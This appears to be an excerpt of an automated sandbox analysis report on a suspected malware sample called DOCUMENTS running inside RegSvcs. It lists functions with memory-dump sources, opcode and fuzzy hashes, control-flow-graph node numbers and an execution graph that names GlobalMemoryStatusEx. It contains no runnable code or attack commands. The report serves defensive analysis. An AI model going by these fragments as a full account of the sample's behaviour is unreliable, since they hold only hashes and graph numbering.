                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06e5ad1c8cbe13ed6a66fa9068467da3c466beb92b3d2a3232f05f21c502735c
                                                • Instruction ID: cd272c23e63d9d9afe6912fc5c6bd997087bfb87823673cb5e0e424f79d911de
                                                • Opcode Fuzzy Hash: 06e5ad1c8cbe13ed6a66fa9068467da3c466beb92b3d2a3232f05f21c502735c
                                                • Instruction Fuzzy Hash: F4F0F6314043449EE7248E15CCC4B62FF98EB52334F18C45AED0A0F696C2799C40CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 070D59A0 Relevance: 4.0, Strings: 3, Instructions: 253COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: T+-q$[V~*$]\`
                                                • API String ID: 0-3978741314
                                                • Opcode ID: 1c644455b18a91d8eba2057f5cea1fdbb936c87f06da0021a078b38e2e66bff1
                                                • Instruction ID: a081c88842c7e2ff623b843e0dbd2c1eb28bb60a4649257dfa096e532888a13c
                                                • Opcode Fuzzy Hash: 1c644455b18a91d8eba2057f5cea1fdbb936c87f06da0021a078b38e2e66bff1
                                                • Instruction Fuzzy Hash: 0AB1D6B0E157199F8B04CFEAD98099EFBF2BF89300F14D62AD819AB254D77099118F64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DC610 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8053b71f4c84877e0c0cce8695d55de955424cb73aedb60200489ba8f3a814a8
                                                • Instruction ID: bbecfc465c6d7b8d7eab99cbfa14855f2c5e83bf1faa4301043a4a0f461ec397
                                                • Opcode Fuzzy Hash: 8053b71f4c84877e0c0cce8695d55de955424cb73aedb60200489ba8f3a814a8
                                                • Instruction Fuzzy Hash: CEE1C4B4E002198FDB14DFA9C580AAEFBF2FB89304F648269D454AB355D731AD42CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DE150 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22f0b1526f36bc3497966b6ebd65567d64a691cbb32ad99bb1017b6d829a0e20
                                                • Instruction ID: 8ebd3f5e0263a983a516673bd248d0c2fe353b6049fd2e9f625419325af8253d
                                                • Opcode Fuzzy Hash: 22f0b1526f36bc3497966b6ebd65567d64a691cbb32ad99bb1017b6d829a0e20
                                                • Instruction Fuzzy Hash: DFE1D6B4E002198FDB14DFA9C580AAEBBF2FF89304F648269D454AB355D730AD42CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DC1D8 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18a777d2c0123de6b2dd62c553b62112b13ef60233f8de1df83380a8ae10393c
                                                • Instruction ID: 9f4e54345c881af85f46d8cd36262ad5cc6000351ef1b4efeced068db63b5289
                                                • Opcode Fuzzy Hash: 18a777d2c0123de6b2dd62c553b62112b13ef60233f8de1df83380a8ae10393c
                                                • Instruction Fuzzy Hash: 48E1D7B4E002598FDB14DFA9C580AAEBBF2FF89304F248269D414AB355D731AD42CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DEA28 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f6b3fc9b570eeba93c1f98545e75cf8045195f855ac94754ab33999460fba11
                                                • Instruction ID: d05c1da39314c25f0b9f698156ef69e3b12a746d05bd60aa67aa6cdfe2e5793a
                                                • Opcode Fuzzy Hash: 8f6b3fc9b570eeba93c1f98545e75cf8045195f855ac94754ab33999460fba11
                                                • Instruction Fuzzy Hash: 81E1D8B4E002198FDB14DFA9C580AAEBBF2FF89304F248269D455AB355D731AD42CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DCA48 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 138c125f5c16fcbd7c0fa0ed10e003875d4a6dd1bbfee2d6db8f50aeb32a9f22
                                                • Instruction ID: aba3ea7acb9056fee95b680c299c9b8f4b6fa6e82601dc92c74e6e69e53b4235
                                                • Opcode Fuzzy Hash: 138c125f5c16fcbd7c0fa0ed10e003875d4a6dd1bbfee2d6db8f50aeb32a9f22
                                                • Instruction Fuzzy Hash: 55E1C8B4E002198FDB14DFA9C580AAEBBF2FF89304F648269D415AB355D731AD42CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070D3997 Relevance: .3, Instructions: 277COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f255aa547eded16f1b946ede620d30edc309aa47c23fb8892f80d8ce9868bf6b
                                                • Instruction ID: 03f456a376b35c40f9af2813ea108a57a9fb2589657701f6a1e2c42c2a2a5d37
                                                • Opcode Fuzzy Hash: f255aa547eded16f1b946ede620d30edc309aa47c23fb8892f80d8ce9868bf6b
                                                • Instruction Fuzzy Hash: C4D1F835D20B5A8BCB11EF64D951A99B771FF96300F10C79AE04A77224EB70AAC4CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011BD2A4 Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 500a64a1d32ce93f063e19f167454f57d54aafeda23fed162119ca40f0ddc88e
                                                • Instruction ID: d80d962d4316954316978fd343a7e5b434c0c77d825c3be2c83d54a74087d689
                                                • Opcode Fuzzy Hash: 500a64a1d32ce93f063e19f167454f57d54aafeda23fed162119ca40f0ddc88e
                                                • Instruction Fuzzy Hash: 7AA18432E00216CFCF19DFB8C8845DEBBB2FF85304B15856AE905AB265DB71E956CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070D39A8 Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91aadb31849a5d49e45abcdbc6e8ca90e29ed0fa970c25787ce0dcb615b30022
                                                • Instruction ID: 0b9e827b4d3c7130c6c33046b0fe0ae189c3b3eca3fdf4b487f9ed880c20a119
                                                • Opcode Fuzzy Hash: 91aadb31849a5d49e45abcdbc6e8ca90e29ed0fa970c25787ce0dcb615b30022
                                                • Instruction Fuzzy Hash: D8D1F535D20B5A8BCB11EF64D951A99B771FF96300F10C79AE14A37224EB70AAC4CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070D396F Relevance: .3, Instructions: 256COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 111c6d74965eb9a78481cf26e42752b7b3ddf68034f6ff6a9c5429956d34cc84
                                                • Instruction ID: 6926e10cdb906e99895685a24fe0f2d1cab3b07347a882ca5686d2b28410c484
                                                • Opcode Fuzzy Hash: 111c6d74965eb9a78481cf26e42752b7b3ddf68034f6ff6a9c5429956d34cc84
                                                • Instruction Fuzzy Hash: 1ED1F535D20B5A8BCB11EF64D951A99B771FF96300F10C79AE04A37225EB70AAC4CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070D05E9 Relevance: .2, Instructions: 170COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9ed5b9636bc0da11d8925ed046008d19877dec605d8546d3bbd069ae4679a3a
                                                • Instruction ID: 52c4add20e949346f3d513fbf9d029912d8510eb364f32e09d0e3239a87f5609
                                                • Opcode Fuzzy Hash: f9ed5b9636bc0da11d8925ed046008d19877dec605d8546d3bbd069ae4679a3a
                                                • Instruction Fuzzy Hash: FD61EDB0A16709EBD740CF90E58915DBFB2FBC9300F25959AC489A7158DB388A64CB46
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070D0006 Relevance: .2, Instructions: 169COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25661db439c5159ac2622db40507b367fa51e707b737a351cb92c918a0b288a5
                                                • Instruction ID: 78c5cb54ebf157482e248e897f658ef905406638eafaa449ea4fc82f973cc38b
                                                • Opcode Fuzzy Hash: 25661db439c5159ac2622db40507b367fa51e707b737a351cb92c918a0b288a5
                                                • Instruction Fuzzy Hash: 846147B5E043499FCB05CFA9C8815EEFFB2BF46200F14C55AD469E7240D2349A82CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070D05F8 Relevance: .2, Instructions: 162COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 96c726f149985d931646e4efcab7b044def39d9caeb6b0b545cd533592299163
                                                • Instruction ID: b064c745376de14792d96577dd965f2671b603a37b09e210bb7fdf0c3d836511
                                                • Opcode Fuzzy Hash: 96c726f149985d931646e4efcab7b044def39d9caeb6b0b545cd533592299163
                                                • Instruction Fuzzy Hash: 6261FEF0A1670EEBD740CF90F18915DBFB2FBC9300F21959AC499A7158DB388A60CB46
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070D0040 Relevance: .2, Instructions: 153COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c466c993049bb4e9e670210a1e08f92c962b6decb28ecdb66fab8a8d22efe6d6
                                                • Instruction ID: dd42bf08d6154ed1ed3bc20dfe402c8dd054c05e34b931c9f26e930766cb93ba
                                                • Opcode Fuzzy Hash: c466c993049bb4e9e670210a1e08f92c962b6decb28ecdb66fab8a8d22efe6d6
                                                • Instruction Fuzzy Hash: E561F4B4E1430AAFCB04DFA9C5815EEFBB6BF89300F14855AD529A7304D3749A818FA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070D21D8 Relevance: .1, Instructions: 143COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 263609e8c2fa9f47cdc210d7547c1046c85dbc714a71f973d6aa99fe77c02ae1
                                                • Instruction ID: ee21247b80d9314a97f9f76ea4dc615fa73955b9de0f51b9fe69d4f849a74e6c
                                                • Opcode Fuzzy Hash: 263609e8c2fa9f47cdc210d7547c1046c85dbc714a71f973d6aa99fe77c02ae1
                                                • Instruction Fuzzy Hash: 6E5127B4E1531ADFCB04CFA6D4455AEFBF2BF8A310F10952AE411B7254E7385A428F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070D21E8 Relevance: .1, Instructions: 142COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6b2b475e52bdbe3c0254fa40b5384149edf6dedaad0c6eba67da41e473453e73
                                                • Instruction ID: a81dcef01ba07fa1891f0f3fdafc43f23473ed55a409b27009f526b52f427a7b
                                                • Opcode Fuzzy Hash: 6b2b475e52bdbe3c0254fa40b5384149edf6dedaad0c6eba67da41e473453e73
                                                • Instruction Fuzzy Hash: 9B5127B0E1531ADFCB08CFA6D4855AEFBF2FF89210F10912AE515B7254E7345A428F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DEA18 Relevance: .1, Instructions: 136COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34e81146212dc541f526e94769cb8b25097c51308e34074287655b07352d01a0
                                                • Instruction ID: ba739d9304df453e0fe8d6e336726229b2fe4108106048d08c6a261d3a6b6e44
                                                • Opcode Fuzzy Hash: 34e81146212dc541f526e94769cb8b25097c51308e34074287655b07352d01a0
                                                • Instruction Fuzzy Hash: CB51E9B4E042198FDB14CFA9C9406AEBBF6EF89304F248269D419AB355D7319D41CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070D03A1 Relevance: .1, Instructions: 104COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e4e19035f661db95344da736ffd9c623d7fc5b96fe9b0c3508c082caf986a16
                                                • Instruction ID: 1fcc7f492a5f16c94a41625957be0bb373e2cba67f6d90d0ac4951af2900985d
                                                • Opcode Fuzzy Hash: 5e4e19035f661db95344da736ffd9c623d7fc5b96fe9b0c3508c082caf986a16
                                                • Instruction Fuzzy Hash: 474105B0E0130A9FCB44CFAAC4855AEFBF2BF89210F24C16AC529B7254D7749A418F54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070D03B0 Relevance: .1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e000b7502e6c08848a8a58971be6bcdb15b0e3ec4ce9cf2a3c502562403f689f
                                                • Instruction ID: 8056bf639ba550355dbabd9360a7b5b18e3ce239e646da7d386d77bd400a8b38
                                                • Opcode Fuzzy Hash: e000b7502e6c08848a8a58971be6bcdb15b0e3ec4ce9cf2a3c502562403f689f
                                                • Instruction Fuzzy Hash: A041D4B0E0030ADFDB44CFAAC4855AEFBF2BF89200F24D16AC519B7254D7749A418F54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:10.8%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:16
                                                Total number of Limit Nodes:3
                                                execution_graph 25888 1581390 25890 1581396 25888->25890 25889 1581484 25890->25889 25892 1587090 25890->25892 25893 158709a 25892->25893 25894 15870b4 25893->25894 25897 669cf7f 25893->25897 25902 669cf90 25893->25902 25894->25890 25898 669cfa5 25897->25898 25899 669d1b6 25898->25899 25900 669d831 GlobalMemoryStatusEx 25898->25900 25901 669d5d2 GlobalMemoryStatusEx 25898->25901 25899->25894 25900->25898 25901->25898 25903 669cfa5 25902->25903 25904 669d1b6 25903->25904 25905 669d831 GlobalMemoryStatusEx 25903->25905 25906 669d5d2 GlobalMemoryStatusEx 25903->25906 25904->25894 25905->25903 25906->25903

                                                Executed Functions

                                                Function 01589B30 Relevance: 2.9, Instructions: 2885COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ab2db942673e352da0514393049586c12d6b548c55d4219ea187d1e42c39fb1
                                                • Instruction ID: f188df2f0d15d8e6043f59f3769d44560bb812a40b0c410a90ed07401b4bf3c6
                                                • Opcode Fuzzy Hash: 4ab2db942673e352da0514393049586c12d6b548c55d4219ea187d1e42c39fb1
                                                • Instruction Fuzzy Hash: DD63FB31D107198EDB11EF68C894AA9F7B1FF99300F15D69AE4587B121EB70AAC4CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0158CFA0 Relevance: 2.3, Instructions: 2309COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 827462c3a2006a5e0439b6c8054552bf0755b6be07ae30ac0d8b35bbcc6890e3
                                                • Instruction ID: 2cb492b6e3c8b04cf882d9954d693471c4faba82252f8f83b012399f2426be18
                                                • Opcode Fuzzy Hash: 827462c3a2006a5e0439b6c8054552bf0755b6be07ae30ac0d8b35bbcc6890e3
                                                • Instruction Fuzzy Hash: DA331E31D107198EDB11EF68C8806ADF7B1FF99300F15C69AE459BB251EB70AAC5CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01583E80 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1788 1583e80-1583ee6 1790 1583ee8-1583ef3 1788->1790 1791 1583f30-1583f32 1788->1791 1790->1791 1793 1583ef5-1583f01 1790->1793 1792 1583f34-1583f8c 1791->1792 1802 1583f8e-1583f99 1792->1802 1803 1583fd6-1583fd8 1792->1803 1794 1583f03-1583f0d 1793->1794 1795 1583f24-1583f2e 1793->1795 1796 1583f0f 1794->1796 1797 1583f11-1583f20 1794->1797 1795->1792 1796->1797 1797->1797 1799 1583f22 1797->1799 1799->1795 1802->1803 1805 1583f9b-1583fa7 1802->1805 1804 1583fda-1583ff2 1803->1804 1812 158403c-158403e 1804->1812 1813 1583ff4-1583fff 1804->1813 1806 1583fa9-1583fb3 1805->1806 1807 1583fca-1583fd4 1805->1807 1808 1583fb5 1806->1808 1809 1583fb7-1583fc6 1806->1809 1807->1804 1808->1809 1809->1809 1811 1583fc8 1809->1811 1811->1807 1814 1584040-15840a2 1812->1814 1813->1812 1815 1584001-158400d 1813->1815 1824 15840ab-158410b 1814->1824 1825 15840a4-15840aa 1814->1825 1816 158400f-1584019 1815->1816 1817 1584030-158403a 1815->1817 1818 158401b 1816->1818 1819 158401d-158402c 1816->1819 1817->1814 1818->1819 1819->1819 1821 158402e 1819->1821 1821->1817 1832 158411b-158411f 1824->1832 1833 158410d-1584111 1824->1833 1825->1824 1835 158412f-1584133 1832->1835 1836 1584121-1584125 1832->1836 1833->1832 1834 1584113 1833->1834 1834->1832 1838 1584143-1584147 1835->1838 1839 1584135-1584139 1835->1839 1836->1835 1837 1584127-158412a call 1580ab8 1836->1837 1837->1835 1842 1584149-158414d 1838->1842 1843 1584157-158415b 1838->1843 1839->1838 1841 158413b-158413e call 1580ab8 1839->1841 1841->1838 1842->1843 1845 158414f-1584152 call 1580ab8 1842->1845 1846 158416b-158416f 1843->1846 1847 158415d-1584161 1843->1847 1845->1843 1849 158417f 1846->1849 1850 1584171-1584175 1846->1850 1847->1846 1848 1584163 1847->1848 1848->1846 1853 1584180 1849->1853 1850->1849 1852 1584177 1850->1852 1852->1849 1853->1853
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j
                                                • API String ID: 0-4284003065
                                                • Opcode ID: d810bf1a1c679555115b0ccdafd4ca97cbf58ec77e4d7cb906e5c5c1dc34c853
                                                • Instruction ID: e0f18173f873751ac1c4c73880008a08116d6b47195280f8746f3fefefeb688b
                                                • Opcode Fuzzy Hash: d810bf1a1c679555115b0ccdafd4ca97cbf58ec77e4d7cb906e5c5c1dc34c853
                                                • Instruction Fuzzy Hash: ED916E70E0020ADFDF10EFA9C98179EBBF2BF88714F148529E815BB254DB749846CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015896E0 Relevance: .4, Instructions: 361COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b97152c3e266554000b71027977ad595cbadbd8e1d17badacd334b87eff8d16
                                                • Instruction ID: 40422d07ea2b97a08cb629dd536c84a66c3a180a20a54f57497e16bbf0fd7f9c
                                                • Opcode Fuzzy Hash: 1b97152c3e266554000b71027977ad595cbadbd8e1d17badacd334b87eff8d16
                                                • Instruction Fuzzy Hash: 20C1B030A002058FDB15EF69D8807AEBBB6FF89314F20856AD509EF395D774D841CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01584A98 Relevance: .3, Instructions: 266COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 588afa55f8ac2d6c5d2735342292d24a935111e43c5124cbf484bb4bd9423c71
                                                • Instruction ID: 523220e2d5a00e05785be23b16ecb87a5733bb66c23095b8d157065004dbf882
                                                • Opcode Fuzzy Hash: 588afa55f8ac2d6c5d2735342292d24a935111e43c5124cbf484bb4bd9423c71
                                                • Instruction Fuzzy Hash: 73B13D70E0021ACFEF10DFA9D8857ADBBF2BF88314F148529D815BB254EB749885CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01584810 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 910 1584810-158489c 913 158489e-15848a9 910->913 914 15848e6-15848e8 910->914 913->914 916 15848ab-15848b7 913->916 915 15848ea-1584902 914->915 923 158494c-158494e 915->923 924 1584904-158490f 915->924 917 15848b9-15848c3 916->917 918 15848da-15848e4 916->918 920 15848c5 917->920 921 15848c7-15848d6 917->921 918->915 920->921 921->921 922 15848d8 921->922 922->918 926 1584950-15849a9 923->926 924->923 925 1584911-158491d 924->925 927 158491f-1584929 925->927 928 1584940-158494a 925->928 935 15849ab-15849b1 926->935 936 15849b2-15849d2 926->936 930 158492b 927->930 931 158492d-158493c 927->931 928->926 930->931 931->931 932 158493e 931->932 932->928 935->936 940 15849dc-1584a0f 936->940 943 1584a1f-1584a23 940->943 944 1584a11-1584a15 940->944 946 1584a33-1584a37 943->946 947 1584a25-1584a29 943->947 944->943 945 1584a17-1584a1a call 1580ab8 944->945 945->943 950 1584a39-1584a3d 946->950 951 1584a47-1584a4b 946->951 947->946 949 1584a2b-1584a2e call 1580ab8 947->949 949->946 950->951 953 1584a3f 950->953 954 1584a5b 951->954 955 1584a4d-1584a51 951->955 953->951 957 1584a5c 954->957 955->954 956 1584a53 955->956 956->954 957->957
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j$\V}j
                                                • API String ID: 0-799745403
                                                • Opcode ID: 530a23b90d2a5f590cd0901b22c19834763076d273324ab42ca990ccf98cdf57
                                                • Instruction ID: 10fdd8d12e7dc91c5715eb073942f2ccad63f08b9d071049e0998f73f71e7e53
                                                • Opcode Fuzzy Hash: 530a23b90d2a5f590cd0901b22c19834763076d273324ab42ca990ccf98cdf57
                                                • Instruction Fuzzy Hash: 55714B70E0024ADFDB10EFA9C88079EBBF2BF88714F148129E815BB254EB749845CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01584804 Relevance: 2.7, Strings: 2, Instructions: 174COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
